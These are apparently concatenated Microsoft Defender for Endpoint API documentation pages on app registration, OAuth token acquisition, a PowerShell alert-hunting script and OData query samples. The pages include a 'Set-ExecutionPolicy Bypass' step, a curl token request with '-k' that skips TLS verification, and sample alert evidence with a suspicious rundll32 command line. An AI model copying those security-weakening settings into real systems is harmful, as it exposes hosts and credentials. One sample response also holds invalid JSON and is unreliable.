-Microsoft Defender for Endpoint exposes much of its data and actions through a set of programmatic APIs. Those APIs will help you automate work flows and innovate based on Defender for Endpoint capabilities. The API access requires OAuth2.0 authentication. For more information, see [OAuth 2.0 Authorization Code Flow](/azure/active-directory/develop/active-directory-v2-protocols-oauth-code).
-
-In general, you'll need to take the following steps to use the APIs:
-- Create a Microsoft Entra application.-- Get an access token using this application.-- Use the token to access Defender for Endpoint API.-
-This article explains how to create a Microsoft Entra application, get an access token to Microsoft Defender for Endpoint, and validate the token.
-
-## Create an app
-
-1. Log on to [Azure](https://portal.azure.com) with a user that has the **Global Administrator** role.
-
-2. Navigate to **Microsoft Entra ID** \> **App registrations** \> **New registration**.
-
- :::image type="content" source="../media/atp-azure-new-app2.png" alt-text="The application registration pane" lightbox="../media/atp-azure-new-app2.png":::
-
-3. In the registration form, choose a name for your application, and then select **Register**.
-
-4. To enable your app to access Defender for Endpoint and assign it **'Read all alerts'** permission, on your application page, select **API Permissions** \> **Add permission** \> **APIs my organization uses** >, type **WindowsDefenderATP**, and then select **WindowsDefenderATP**.
-
- > [!NOTE]
- > *WindowsDefenderATP* does not appear in the original list. Start writing its name in the text box to see it appear.
-
- :::image type="content" source="../media/add-permission.png" alt-text="The API permissions pane" lightbox="../media/add-permission.png":::
-
- Select **Application permissions** \> **Alert.Read.All**, and then select **Add permissions**.
-
- :::image type="content" source="../media/application-permissions.png" alt-text="The application permission information pane" lightbox="../media/application-permissions.png":::
-
- You need to select the relevant permissions. 'Read All Alerts' is only an example. For example:
-
- - To [run advanced queries](run-advanced-query-api.md), select the 'Run advanced queries' permission.
- - To [isolate a device](isolate-machine.md), select the 'Isolate machine' permission.
- - To determine which permission you need, look at the **Permissions** section in the API you are interested to call.
-
-5. Select **Grant consent**.
-
- > [!NOTE]
- > Every time you add a permission, you must select **Grant consent** for the new permission to take effect.
-
- :::image type="content" source="../media/grant-consent.png" alt-text="The grant permissions page" lightbox="../media/grant-consent.png":::
-
-6. To add a secret to the application, select **Certificates & secrets**, add a description to the secret, and then select **Add**.
-
- > [!NOTE]
- > After you select **Add**, select **copy the generated secret value**. You won't be able to retrieve this value after you leave.
-
- :::image type="content" source="../media/webapp-create-key2.png" alt-text="The create application option" lightbox="../media/webapp-create-key2.png":::
-
-7. Write down your application ID and your tenant ID. On your application page, go to **Overview** and copy the following.
-
- :::image type="content" source="../media/app-and-tenant-ids.png" alt-text="The created app and tenant IDs" lightbox="../media/app-and-tenant-ids.png":::
-
-8. **For Microsoft Defender for Endpoint Partners only**. Set your app to be multi-tenanted (available in all tenants after consent). This is **required** for third-party apps (for example, if you create an app that is intended to run in multiple customers' tenant). This is **not required** if you create a service that you want to run in your tenant only (for example, if you create an application for your own usage that will only interact with your own data). To set your app to be multi-tenanted:
-
- - Go to **Authentication**, and add `https://portal.azure.com` as the **Redirect URI**.
-
- - On the bottom of the page, under **Supported account types**, select the **Accounts in any organizational directory** application consent for your multi-tenant app.
-
- You need your application to be approved in each tenant where you intend to use it. This is because your application interacts Defender for Endpoint on behalf of your customer.
-
- You (or your customer if you are writing a third-party app) need to select the consent link and approve your app. The consent should be done with a user who has administrative privileges in Active Directory.
-
- The consent link is formed as follows:
-
- ```https
- https://login.microsoftonline.com/common/oauth2/authorize?prompt=consent&client_id=00000000-0000-0000-0000-000000000000&response_type=code&sso_reload=true
- ```
-
- Where 00000000-0000-0000-0000-000000000000 is replaced with your application ID.
--
-**Done!** You have successfully registered an application! See examples below for token acquisition and validation.
-
-## Get an access token
-
-For more information on Microsoft Entra tokens, see the [Microsoft Entra tutorial](/azure/active-directory/develop/active-directory-v2-protocols-oauth-client-creds).
-
-### Use PowerShell
-
-```powershell
-# This script acquires the App Context Token and stores it in the variable $token for later use in the script.
-# Paste your Tenant ID, App ID, and App Secret (App key) into the indicated quotes below.
-
-$tenantId = '' ### Paste your tenant ID here
-$appId = '' ### Paste your Application ID here
-$appSecret = '' ### Paste your Application key here
-
-$sourceAppIdUri = 'https://api.securitycenter.microsoft.com/.default'
-$oAuthUri = "https://login.microsoftonline.com/$TenantId/oauth2/v2.0/token"
-$authBody = [Ordered] @{
- scope = "$sourceAppIdUri"
- client_id = "$appId"
- client_secret = "$appSecret"
- grant_type = 'client_credentials'
-}
-$authResponse = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body $authBody -ErrorAction Stop
-$token = $authResponse.access_token
-$token
-```
-
-### Use C#:
-
-The following code was tested with NuGet Microsoft.Identity.Client 3.19.8.
-
-> [!IMPORTANT]
-> The [Microsoft.IdentityModel.Clients.ActiveDirectory](https://www.nuget.org/packages/Microsoft.IdentityModel.Clients.ActiveDirectory) NuGet package and Azure AD Authentication Library (ADAL) have been deprecated. No new features have been added since June 30, 2020. We strongly encourage you to upgrade, see the [migration guide](/azure/active-directory/develop/msal-migration) for more details.
-
-1. Create a new console application.
-1. Install NuGet [Microsoft.Identity.Client](https://www.nuget.org/packages/Microsoft.Identity.Client/).
-1. Add the following:
-
- ```csharp
- using Microsoft.Identity.Client;
- ```
-
-1. Copy and paste the following code in your app (don't forget to update the three variables: ```tenantId, appId, appSecret```):
-
- ```csharp
- string tenantId = "00000000-0000-0000-0000-000000000000"; // Paste your own tenant ID here
- string appId = "11111111-1111-1111-1111-111111111111"; // Paste your own app ID here
- string appSecret = "22222222-2222-2222-2222-222222222222"; // Paste your own app secret here for a test, and then store it in a safe place!
- const string authority = "https://login.microsoftonline.com";
- const string audience = "https://api.securitycenter.microsoft.com";
-
- IConfidentialClientApplication myApp = ConfidentialClientApplicationBuilder.Create(appId).WithClientSecret(appSecret).WithAuthority($"{authority}/{tenantId}").Build();
-
- List<string> scopes = new List<string>() { $"{audience}/.default" };
-
- AuthenticationResult authResult = myApp.AcquireTokenForClient(scopes).ExecuteAsync().GetAwaiter().GetResult();
-
- string token = authResult.AccessToken;
- ```
-### Use Python
-
-See [Get token using Python](run-advanced-query-sample-python.md#get-token).
-
-### Use Curl
-
-> [!NOTE]
-> The following procedure assumes that Curl for Windows is already installed on your computer.
-
-1. Open a command prompt, and set CLIENT_ID to your Azure application ID.
-1. Set CLIENT_SECRET to your Azure application secret.
-1. Set TENANT_ID to the Azure tenant ID of the customer that wants to use your app to access Defender for Endpoint.
-1. Run the following command:
-
- ```console
- curl -i -X POST -H "Content-Type:application/x-www-form-urlencoded" -d "grant_type=client_credentials" -d "client_id=%CLIENT_ID%" -d "scope=https://securitycenter.onmicrosoft.com/windowsatpservice/.default" -d "client_secret=%CLIENT_SECRET%" "https://login.microsoftonline.com/%TENANT_ID%/oauth2/v2.0/token" -k
- ```
-
- You will get an answer in the following form:
-
- ```console
- {"token_type":"Bearer","expires_in":3599,"ext_expires_in":0,"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIn <truncated> aWReH7P0s0tjTBX8wGWqJUdDA"}
- ```
-
-## Validate the token
-
-Ensure that you got the correct token:
-
-1. Copy and paste the token you got in the previous step into [JWT](https://jwt.ms) in order to decode it.
-
-1. Validate that you get a 'roles' claim with the desired permissions.
-
- In the following image, you can see a decoded token acquired from an app with permissions to all of Microsoft Defender for Endpoint's roles:
-
- :::image type="content" source="../media/webapp-decoded-token.png" alt-text="The token details portion" lightbox="../media/webapp-decoded-token.png":::
-
-## Use the token to access Microsoft Defender for Endpoint API
-
-1. Choose the API you want to use. For more information, see [Supported Defender for Endpoint APIs](exposed-apis-list.md).
-1. Set the authorization header in the http request you send to "Bearer {token}" (Bearer is the authorization scheme).
-1. The expiration time of the token is one hour. You can send more than one request with the same token.
-
-The following is an example of sending a request to get a list of alerts **using C#**:
-
-```csharp
-var httpClient = new HttpClient();
-
-var request = new HttpRequestMessage(HttpMethod.Get, "https://api.securitycenter.microsoft.com/api/alerts");
-
-request.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);
-
-var response = httpClient.SendAsync(request).GetAwaiter().GetResult();
-
-// Do something useful with the response
-```
-
-## See also
-- [Supported Microsoft Defender for Endpoint APIs](exposed-apis-list.md)-- [Access Microsoft Defender for Endpoint on behalf of a user](exposed-apis-create-app-nativeapp.md)
security Exposed Apis Full Sample Powershell https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/exposed-apis-full-sample-powershell.md
- Title: Advanced Hunting with PowerShell API Guide-
-description: Use these code samples, querying several Microsoft Defender for Endpoint APIs.
------- m365-security-- tier3-- must-keep- Previously updated : 01/25/2023----
-# Microsoft Defender for Endpoint APIs using PowerShell
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Business](../../defender-business/index.yml)-
-> [!IMPORTANT]
-> Advanced hunting capabilities are not included in Defender for Business.
-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-enablesiem-abovefoldlink)
-
-Full scenario using multiple APIs from Microsoft Defender for Endpoint.
-
-In this section, we share PowerShell samples to
-- Retrieve a token -- Use token to retrieve the latest alerts in Microsoft Defender for Endpoint-- For each alert, if the alert has medium or high priority and is still in progress, check how many times the device has connected to suspicious URL.-
-**Prerequisite**: You first need to [create an app](apis-intro.md).
-
-## Preparation instructions
--- Open a PowerShell window.-- If your policy doesn't allow you to run the PowerShell commands, you can run the below command:
- ```
- Set-ExecutionPolicy -ExecutionPolicy Bypass
- ```
-
-For more information, see [PowerShell documentation](/powershell/module/microsoft.powershell.security/set-executionpolicy)
-
-## Get token
-
-Run the below:
--- $tenantId: ID of the tenant on behalf of which you want to run the query (that is, the query is run on the data of this tenant)-- $appId: ID of your Microsoft Entra app (the app must have 'Run advanced queries' permission to Defender for Endpoint)-- $appSecret: Secret of your Microsoft Entra app--- $suspiciousUrl: The URL--
-```
-$tenantId = '00000000-0000-0000-0000-000000000000' # Paste your own tenant ID here
-$appId = '11111111-1111-1111-1111-111111111111' # Paste your own app ID here
-$appSecret = '22222222-2222-2222-2222-222222222222' # Paste your own app secret here
-$suspiciousUrl = 'www.suspiciousUrl.com' # Paste your own URL here
-
-$resourceAppIdUri = 'https://securitycenter.onmicrosoft.com/windowsatpservice'
-$oAuthUri = "https://login.microsoftonline.com/$TenantId/oauth2/token"
-$authBody = [Ordered] @{
- resource = "$resourceAppIdUri"
- client_id = "$appId"
- client_secret = "$appSecret"
- grant_type = 'client_credentials'
-}
-$authResponse = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body $authBody -ErrorAction Stop
-$aadToken = $authResponse.access_token
--
-#Get latest alert
-$alertUrl = "https://api.securitycenter.microsoft.com/api/alerts?`$top=10"
-$headers = @{
- 'Content-Type' = 'application/json'
- Accept = 'application/json'
- Authorization = "Bearer $aadToken"
-}
-$alertResponse = Invoke-WebRequest -Method Get -Uri $alertUrl -Headers $headers -ErrorAction Stop
-$alerts = ($alertResponse | ConvertFrom-Json).value
-
-$machinesToInvestigate = New-Object System.Collections.ArrayList
-
-Foreach($alert in $alerts)
-{
- #echo $alert.id $alert.machineId $alert.severity $alert.status
-
- $isSevereAlert = $alert.severity -in 'Medium', 'High'
- $isOpenAlert = $alert.status -in 'InProgress', 'New'
- if($isOpenAlert -and $isSevereAlert)
- {
- if (-not $machinesToInvestigate.Contains($alert.machineId))
- {
- $machinesToInvestigate.Add($alert.machineId) > $null
- }
- }
-}
-
-$commaSeparatedMachines = '"{0}"' -f ($machinesToInvestigate -join '","')
-
-$query = "NetworkCommunicationEvents
-| where MachineId in ($commaSeparatedMachines)
-| where RemoteUrl == `"$suspiciousUrl`"
-| summarize ConnectionsCount = count() by MachineId"
-
-$queryUrl = "https://api.securitycenter.microsoft.com/api/advancedqueries/run"
-
-$queryBody = ConvertTo-Json -InputObject @{ 'Query' = $query }
-$queryResponse = Invoke-WebRequest -Method Post -Uri $queryUrl -Headers $headers -Body $queryBody -ErrorAction Stop
-$response = ($queryResponse | ConvertFrom-Json).Results
-$response
-```
--
-## See also
-- [Microsoft Defender for Endpoint APIs](apis-intro.md)-- [Advanced Hunting API](run-advanced-query-api.md)-- [Advanced Hunting using Python](run-advanced-query-sample-python.md)
security Exposed Apis List https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/exposed-apis-list.md
- Title: Supported Microsoft Defender for Endpoint APIs-
-description: Learn about the specific supported Microsoft Defender for Endpoint entities where you can create API calls to.
--- Previously updated : 04/17/2024---- m365-security-- tier3-- must-keep-----
-# Supported Microsoft Defender for Endpoint APIs
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Business](../../defender-business/index.yml)-
-> [!IMPORTANT]
-> Advanced hunting capabilities are not included in Defender for Business.
--
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-## Endpoint URI and versioning
-
-### Endpoint URI
-
-> The service base URI is: [https://api.security.microsoft.com](https://api.security.microsoft.com)
->
-> The queries based OData have the '/api' prefix. For example, to get Alerts you can send GET request to [https://api.security.microsoft.com/api/alerts](https://api.security.microsoft.com/api/alerts)
-
-### Versioning
-
-> The API supports versioning.
-> > The current version is **V1.0**.
-> > To use a specific version, use this format: `https://api.security.microsoft.com/api/{Version}`. For example: `https://api.security.microsoft.com/api/v1.0/alerts`
->
-> If you don't specify any version (e.g. `https://api.security.microsoft.com/api/alerts`) you will get to the latest version.
---
-Learn more about the individual supported entities where you can run API calls to and details such as HTTP request values, request headers and expected responses.
-
-## In this section
-
-Topic | Description
-:|:
-[**Advanced Hunting** methods](run-advanced-query-api.md) | Run queries from API.
-[**Alert** methods and properties](alerts.md) | Run API calls such as \- get alerts, create alert, update alert and more.
-[Export **Assessment** per-device methods and properties](get-assessment-methods-properties.md) | Run API calls to gather vulnerability assessments on a per-device basis, such as: \- export secure configuration assessment, export software inventory assessment, export software vulnerabilities assessment, and delta export software vulnerabilities assessment.
-[**Automated investigation** methods and properties](investigation.md) | Run API calls such as \- get collection of Investigation.
-[Export device health methods and properties](device-health-api-methods-properties.md) | Run API Calls such as \- GET /api/public/avdeviceshealth.
-[**Domain**-related alerts](get-domain-related-alerts.md) | Run API calls such as \- get domain-related devices, domain statistics and more.
-[**File** methods and properties](files.md) | Run API calls such as \- get file information, file related alerts, file related devices, and file statistics.
-[**Indicators** methods and properties](ti-indicator.md) | Run API call such as \- get Indicators, create Indicator, and delete Indicators.
-[**IP**-related alerts](get-ip-related-alerts.md) | Run API calls such as \- get IP-related alerts and get IP statistics.
-[**Machine** methods and properties](machine.md) | Run API calls such as \- get devices, get devices by ID, information about logged on users, edit tags and more.
-[**Machine Action** methods and properties](machineaction.md) | Run API call such as \- Isolation, Run anti-virus scan and more.
-[**Recommendation** methods and properties](recommendation.md) | Run API calls such as \- get recommendation by ID.
-[**Remediation activity** methods and properties](get-remediation-methods-properties.md) | Run API call such as \- get all remediation tasks, get exposed devices remediation task and get one remediation task by id.
-[**Score** methods and properties](score.md) | Run API calls such as \- get exposure score or get device secure score.
-[**Software** methods and properties](software.md) | Run API calls such as \- list vulnerabilities by software.
-[**User** methods and properties](user.md) | Run API calls such as \- get user-related alerts and user-related devices.
-[**Vulnerability** methods and properties](vulnerability.md) | Run API calls such as \- list devices by vulnerability.
-
-## See also
--- [Microsoft Defender for Endpoint APIs](apis-intro.md)--- [Microsoft Defender for Endpoint API release notes](api-release-notes.md)
security Exposed Apis Odata Samples https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/exposed-apis-odata-samples.md
- Title: OData queries with Microsoft Defender for Endpoint-
-description: Use these examples of Open Data Protocol (OData) queries to help with data access protocols in Microsoft Defender for Endpoint.
--- Previously updated : 01/25/2023---- m365-security-- tier3-- must-keep-----
-# OData queries with Microsoft Defender for Endpoint
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Business](../../defender-business/index.yml)-
-> [!IMPORTANT]
-> Advanced hunting capabilities are not included in Defender for Business.
-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-If you aren't familiar with OData queries, see: [OData V4 queries](https://www.odata.org/documentation/)
-
-Not all properties are filterable.
-
-## Properties that support $filter
--- [Alert](alerts.md): `alertCreationTime`, `lastUpdateTime`, `incidentId`,`InvestigationId`, `status`, `severity`, and `category`.-- [Machine](machine.md): `ComputerDnsName`, `LastSeen`, `HealthStatus`, `OsPlatform`, `onboardingStatus`, `RiskScore`, and `RbacGroupId`.-- [MachineAction](machineaction.md): `Status`, `MachineId`, `Type`, `Requestor`, and `CreationDateTimeUtc`.-- [Indicator](ti-indicator.md): `indicatorValue`, `indicatorType`, `creationTimeDateTimeUtc`, `createdBy`, `severity`, and `action`.-
-### Example 1
-
-Get 10 latest Alerts with related Evidence:
-
-```http
-HTTP GET https://api.securitycenter.microsoft.com/api/alerts?$top=10&$expand=evidence
-```
-
-#### Response
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Alerts",
- "value": [
- {
- "id": "da637472900382838869_1364969609",
- "incidentId": 1126093,
- "investigationId": null,
- "assignedTo": null,
- "severity": "Low",
- "status": "New",
- "classification": null,
- "determination": null,
- "investigationState": "Queued",
- "detectionSource": "WindowsDefenderAtp",
- "detectorId": "17e10bbc-3a68-474a-8aad-faef14d43952",
- "category": "Execution",
- "threatFamilyName": null,
- "title": "Low-reputation arbitrary code executed by signed executable",
- "description": "Binaries signed by Microsoft can be used to run low-reputation arbitrary code. This technique hides the execution of malicious code within a trusted process. As a result, the trusted process might exhibit suspicious behaviors, such as opening a listening port or connecting to a command-and-control (C&C) server.",
- "alertCreationTime": "2021-01-26T20:33:57.7220239Z",
- "firstEventTime": "2021-01-26T20:31:32.9562661Z",
- "lastEventTime": "2021-01-26T20:31:33.0577322Z",
- "lastUpdateTime": "2021-01-26T20:33:59.2Z",
- "resolvedTime": null,
- "machineId": "111e6dd8c833c8a052ea231ec1b19adaf497b625",
- "computerDnsName": "temp123.middleeast.corp.microsoft.com",
- "rbacGroupName": "A",
- "aadTenantId": "a839b112-1253-6432-9bf6-94542403f21c",
- "threatName": null,
- "mitreTechniques": [
- "T1064",
- "T1085",
- "T1220"
- ],
- "relatedUser": {
- "userName": "temp123",
- "domainName": "DOMAIN"
- },
- "comments": [
- {
- "comment": "test comment for docs",
- "createdBy": "secop123@contoso.com",
- "createdTime": "2021-01-26T01:00:37.8404534Z"
- }
- ],
- "evidence": [
- {
- "entityType": "User",
- "evidenceCreationTime": "2021-01-26T20:33:58.42Z",
- "sha1": null,
- "sha256": null,
- "fileName": null,
- "filePath": null,
- "processId": null,
- "processCommandLine": null,
- "processCreationTime": null,
- "parentProcessId": null,
- "parentProcessCreationTime": null,
- "parentProcessFileName": null,
- "parentProcessFilePath": null,
- "ipAddress": null,
- "url": null,
- "registryKey": null,
- "registryHive": null,
- "registryValueType": null,
- "registryValue": null,
- "accountName": "name",
- "domainName": "DOMAIN",
- "userSid": "S-1-5-21-11111607-1111760036-109187956-75141",
- "aadUserId": "11118379-2a59-1111-ac3c-a51eb4a3c627",
- "userPrincipalName": "temp123@microsoft.com",
- "detectionStatus": null
- },
- {
- "entityType": "Process",
- "evidenceCreationTime": "2021-01-26T20:33:58.6133333Z",
- "sha1": "ff836cfb1af40252bd2a2ea843032e99a5b262ed",
- "sha256": "a4752c71d81afd3d5865d24ddb11a6b0c615062fcc448d24050c2172d2cbccd6",
- "fileName": "rundll32.exe",
- "filePath": "C:\\Windows\\SysWOW64",
- "processId": 3276,
- "processCommandLine": "rundll32.exe c:\\temp\\suspicious.dll,RepeatAfterMe",
- "processCreationTime": "2021-01-26T20:31:32.9581596Z",
- "parentProcessId": 8420,
- "parentProcessCreationTime": "2021-01-26T20:31:32.9004163Z",
- "parentProcessFileName": "rundll32.exe",
- "parentProcessFilePath": "C:\\Windows\\System32",
- "ipAddress": null,
- "url": null,
- "registryKey": null,
- "registryHive": null,
- "registryValueType": null,
- "registryValue": null,
- "accountName": null,
- "domainName": null,
- "userSid": null,
- "aadUserId": null,
- "userPrincipalName": null,
- "detectionStatus": "Detected"
- },
- {
- "entityType": "File",
- "evidenceCreationTime": "2021-01-26T20:33:58.42Z",
- "sha1": "8563f95b2f8a284fc99da44500cd51a77c1ff36c",
- "sha256": "dc0ade0c95d6db98882bc8fa6707e64353cd6f7767ff48d6a81a6c2aef21c608",
- "fileName": "suspicious.dll",
- "filePath": "c:\\temp",
- "processId": null,
- "processCommandLine": null,
- "processCreationTime": null,
- "parentProcessId": null,
- "parentProcessCreationTime": null,
- "parentProcessFileName": null,
- "parentProcessFilePath": null,
- "ipAddress": null,
- "url": null,
- "registryKey": null,
- "registryHive": null,
- "registryValueType": null,
- "registryValue": null,
- "accountName": null,
- "domainName": null,
- "userSid": null,
- "aadUserId": null,
- "userPrincipalName": null,
- "detectionStatus": "Detected"
- }
- ]
- },
- ...
- ]
-}
-```
-
-### Example 2
-
-Get all the alerts last updated after 2019-11-22 00:00:00:
-
-```http
-HTTP GET https://api.securitycenter.microsoft.com/api/alerts?$filter=lastUpdateTime+ge+2019-11-22T00:00:00Z
-```
-
-#### Response
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Alerts",
- "value": [
- {
- "id": "da637308392288907382_-880718168",
- "incidentId": 7587,
- "investigationId": 723156,
- "assignedTo": "secop123@contoso.com",
- "severity": "Low",
- "status": "New",
- "classification": "TruePositive",
- "determination": null,
- "investigationState": "Queued",
- "detectionSource": "WindowsDefenderAv",
- "category": "SuspiciousActivity",
- "threatFamilyName": "Meterpreter",
- "title": "Suspicious 'Meterpreter' behavior was detected",
- "description": "Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.\n\nA malware is considered active if it is found running on the machine or it already has persistence mechanisms in place. Active malware detections are assigned higher severity ratings.\n\nBecause this malware was active, take precautionary measures and check for residual signs of infection.",
- "alertCreationTime": "2020-07-20T10:53:48.7657932Z",
- "firstEventTime": "2020-07-20T10:52:17.6654369Z",
- "lastEventTime": "2020-07-20T10:52:18.1362905Z",
- "lastUpdateTime": "2020-07-20T10:53:50.19Z",
- "resolvedTime": null,
- "machineId": "12ee6dd8c833c8a052ea231ec1b19adaf497b625",
- "computerDnsName": "temp123.middleeast.corp.microsoft.com",
- "rbacGroupName": "MiddleEast",
- "aadTenantId": "a839b112-1253-6432-9bf6-94542403f21c",
- "threatName": null,
- "mitreTechniques": [
- "T1064",
- "T1085",
- "T1220"
- ],
- "relatedUser": {
- "userName": "temp123",
- "domainName": "DOMAIN"
- },
- "comments": [
- {
- "comment": "test comment for docs",
- "createdBy": "secop123@contoso.com",
- "createdTime": "2020-07-21T01:00:37.8404534Z"
- }
- ],
- "evidence": []
- }
- ...
- ]
-}
-```
-
-### Example 3
-
-Get all the devices with 'High' 'RiskScore':
-
-```http
-HTTP GET https://api.securitycenter.microsoft.com/api/machines?$filter=riskScore+eq+'High'
-```
-
-#### Response
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Machines",
- "value": [
- {
- "id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
- "computerDnsName": "mymachine1.contoso.com",
- "firstSeen": "2018-08-02T14:55:03.7791856Z",
- "lastSeen": "2021-01-25T07:27:36.052313Z",
- "osPlatform": "Windows10" "Windows11",
- "osProcessor": "x64",
- "version": "1901",
- "lastIpAddress": "10.166.113.46",
- "lastExternalIpAddress": "167.220.203.175",
- "osBuild": 19042,
- "healthStatus": "Active",
- "deviceValue": "Normal",
- "rbacGroupName": "The-A-Team",
- "riskScore": "High",
- "exposureLevel": "Low",
- "aadDeviceId": "fd2e4d29-7072-4195-aaa5-1af139b78028",
- "machineTags": [
- "Tag1",
- "Tag2"
- ],
- "ipAddresses": [
- {
- "ipAddress": "10.166.113.47",
- "macAddress": "8CEC4B897E73",
- "operationalStatus": "Up"
- },
- {
- "ipAddress": "2a01:110:68:4:59e4:3916:3b3e:4f96",
- "macAddress": "8CEC4B897E73",
- "operationalStatus": "Up"
- }
- ]
- },
- ...
- ]
-}
-```
-
-### Example 4
-
-Get top 100 devices with 'HealthStatus' not equals to 'Active':
-
-```http
-HTTP GET https://api.securitycenter.microsoft.com/api/machines?$filter=healthStatus+ne+'Active'&$top=100
-```
-
-#### Response
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Machines",
- "value": [
- {
- "id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
- "computerDnsName": "mymachine1.contoso.com",
- "firstSeen": "2018-08-02T14:55:03.7791856Z",
- "lastSeen": "2021-01-25T07:27:36.052313Z",
- "osPlatform": "Windows10",
- "osProcessor": "x64",
- "version": "1901",
- "lastIpAddress": "10.166.113.46",
- "lastExternalIpAddress": "167.220.203.175",
- "osBuild": 19042,
- "healthStatus": "Active",
- "deviceValue": "Normal",
- "rbacGroupName": "The-A-Team",
- "riskScore": "Low",
- "exposureLevel": "Low",
- "aadDeviceId": "fd2e4d29-7072-4195-aaa5-1af139b78028",
- "machineTags": [
- "Tag1",
- "Tag2"
- ],
- "ipAddresses": [
- {
- "ipAddress": "10.166.113.47",
- "macAddress": "8CEC4B897E73",
- "operationalStatus": "Up"
- },
- {
- "ipAddress": "2a01:110:68:4:59e4:3916:3b3e:4f96",
- "macAddress": "8CEC4B897E73",
- "operationalStatus": "Up"
- }
- ]
- },
- ...
- ]
-}
-```
-
-### Example 5
-
-Get all the devices that last seen after 2018-10-20:
-
-```http
-HTTP GET https://api.securitycenter.microsoft.com/api/machines?$filter=lastSeen gt 2018-08-01Z
-```
-
-#### Response
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Machines",
- "value": [
- {
- "id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
- "computerDnsName": "mymachine1.contoso.com",
- "firstSeen": "2018-08-02T14:55:03.7791856Z",
- "lastSeen": "2021-01-25T07:27:36.052313Z",
- "osPlatform": "Windows10",
- "osProcessor": "x64",
- "version": "1901",
- "lastIpAddress": "10.166.113.46",
- "lastExternalIpAddress": "167.220.203.175",
- "osBuild": 19042,
- "healthStatus": "Active",
- "deviceValue": "Normal",
- "rbacGroupName": "The-A-Team",
- "riskScore": "Low",
- "exposureLevel": "Low",
- "aadDeviceId": "fd2e4d29-7072-4195-aaa5-1af139b78028",
- "machineTags": [
- "Tag1",
- "Tag2"
- ],
- "ipAddresses": [
- {
- "ipAddress": "10.166.113.47",
- "macAddress": "8CEC4B897E73",
- "operationalStatus": "Up"
- },
- {
- "ipAddress": "2a01:110:68:4:59e4:3916:3b3e:4f96",
- "macAddress": "8CEC4B897E73",
- "operationalStatus": "Up"
- }
- ]
- },
- ...
- ]
-}
-```
-
-### Example 6
-
-Get all the Anti-Virus scans that the user Analyst@examples.onmicrosoft.com created using Microsoft Defender for Endpoint:
-
-```http
-HTTP GET https://api.securitycenter.microsoft.com/api/machineactions?$filter=requestor eq 'Analyst@contoso.com' and type eq 'RunAntiVirusScan'
-```
-
-#### Response
-
-```json
-json{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#MachineActions",
- "value": [
- {
- "id": "2e9da30d-27f6-4208-81f2-9cd3d67893ba",
- "type": "RunAntiVirusScan",
- "scope": "Full",
- "requestor": "Analyst@contoso.com",
- "requestorComment": "Check machine for viruses due to alert 3212",
- "status": "Succeeded",
- "machineId": "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f",
- "computerDnsName": "desktop-39g9tgl",
- "creationDateTimeUtc": "2018-12-04T12:18:27.1293487Z",
- "lastUpdateTimeUtc": "2018-12-04T12:18:57.5511934Z",
- "relatedFileInfo": null
- },
- ...
- ]
-}
-```
-
-### Example 7
-
-Get the count of open alerts for a specific device:
-
-```http
-HTTP GET https://api.securitycenter.microsoft.com/api/machines/123321d0c675eaa415b8e5f383c6388bff446c62/alerts/$count?$filter=status ne 'Resolved'
-```
-
-#### Response
-
-```json
-4
-```
-
-### Example 8
-
-Get all the devices with 'computerDnsName' starting with 'mymachine':
-
-```http
-HTTP GET https://api.securitycenter.microsoft.com/api/machines?$filter=startswith(computerDnsName,'mymachine')
-```
-
-#### Response
-
-```json
-json{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Machines",
- "value": [
- {
- "id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
- "computerDnsName": "mymachine1.contoso.com",
